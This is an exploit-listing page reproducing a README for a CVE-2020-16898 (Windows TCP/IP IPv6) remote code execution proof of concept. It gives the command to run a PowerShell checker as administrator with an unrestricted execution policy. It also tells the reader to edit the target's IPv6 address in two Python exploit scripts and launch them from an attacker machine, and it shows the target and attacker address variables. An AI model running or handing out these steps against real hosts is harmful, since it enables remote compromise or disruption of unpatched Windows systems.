Sploitus

Exploit for CVE-2020-16898--EXP-POC

kitploit · 2026-08-26

Exploit Code

MARKDOWN52 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KOMOMON-CVE-2020-16898--EXP-POC
# CVE-2020-16898

CVE-2020-16898 Windows TCP/IP リモートコード実行の脆弱性 EXP&POC

## 再現

forforever:https://www.cnblogs.com/forforever/p/13846077.html

## poc

**CVE-2020-16898_Checker-poc**

コマンド:

管理者としてPowerShell/CMDを起動

root@kitploit:~
    
    
    Powershell.exe -ExecutionPolicy UnRestricted -File .\CVE-2020-16898-poc.ps1
    

## exp

**cve-2020-16898-exp2**

条件:対象と通信可能で、対象のリンクローカルIPv6アドレスが分かっていること

使用方法

root@kitploit:~
    
    
    修改代码中的dst参数为目标的本地链接IPv6地址
    然后攻击机执行
    python3 CVE-2020-16898.py即可
    

![image-20201020130144332](https://assets.kitploit.com/production/public/readmes/28153/cfcfd41dae8dbe0ef135ec3d16e00fdd18899dbc14ad7b9a0b2111d21fc9c0b5.png)

![img](https://assets.kitploit.com/production/public/readmes/28153/b9a4ff8b37fed0201f49c2b79befea810c9d060a983f457d98e4d9122a0a8ae2.png)

**CVE-2020-16898-exp1.py**

対象の「IPv6アドレス」または「一時IPv6アドレス」と、自分のリンクローカルIPv6アドレスが必要

root@kitploit:~
    
    
    v6_dst = "fd15:4ba5:5a2b:1008:109f:9a46:8d19:f103"	#修改为目标机的ipv6地址 或者 临时ipv6地址
    v6_src = "fe80::501a:49b7:b7d:5362%12"				      #攻击者的本地ipv6地址